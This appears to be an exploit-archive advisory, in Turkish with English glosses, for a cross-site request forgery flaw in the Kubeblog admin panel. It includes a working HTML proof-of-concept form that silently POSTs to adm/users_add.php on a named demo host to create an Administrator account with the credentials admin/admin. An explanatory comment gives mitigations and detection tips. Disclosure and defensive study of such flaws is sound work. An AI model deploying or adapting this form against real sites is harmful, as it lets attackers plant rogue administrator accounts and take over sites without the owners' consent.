< ------------------- header data start ------------------- >

#############################################################

# Application Name : Kubeblog
# Vulnerability Type : XSRF (cross-site request forgery, also written CSRF)

# Infection : Uzaktan otomatik olarak admin eklenebilir. (Impact: an administrator account can be added remotely and automatically.)

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir. (Fix: add a session token to the form and require the old password.)

# author : SysteM-HackeR

############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

<!--
  Proof-of-concept form for the XSRF issue described in the header.

  What it shows: a page on any origin can carry a form that POSTs to the
  blog's admin endpoint (adm/users_add.php) with the fields username,
  password, password2 and user_type. The form contains no per-session
  token field and no current-password field. Per the advisory, the request
  is accepted when the browser sending it holds a logged-in administrator
  session, because the session cookie is attached automatically and the
  request carries no other proof that the admin intended it.

  Defender notes:
  - Mitigation: issue an unpredictable anti-CSRF token bound to the admin
    session, embed it in the real form, and reject any POST to this
    endpoint whose token is missing or does not match. Requiring the
    acting admin's current password for account creation, as the header
    advises, adds a second barrier.
  - Defence in depth: set the session cookie with the SameSite attribute
    and check the Origin / Referer header on state-changing requests.
  - Detection: review web logs for POSTs to users_add.php whose Referer or
    Origin is not the blog's own host, and audit the user table for
    administrator accounts nobody remembers creating.
-->
<form name=form1 method=post action=http://demos.kubelabs.com/kubeblog/adm/users_add.php>
<input name=username type=Text class=textbox id=username style=width:60% value=admin>
<input name=password type=password class=textbox id=password style=width:60% value=admin>
<input name=password2 type=password class=textbox id=password2 style=width:60% value=admin>
<select name=user_type>
<option value=’3’>Administrator</option></select>
<input name=Submit type=submit class=button value=Submit>
</form>


< -- bug code end of -- >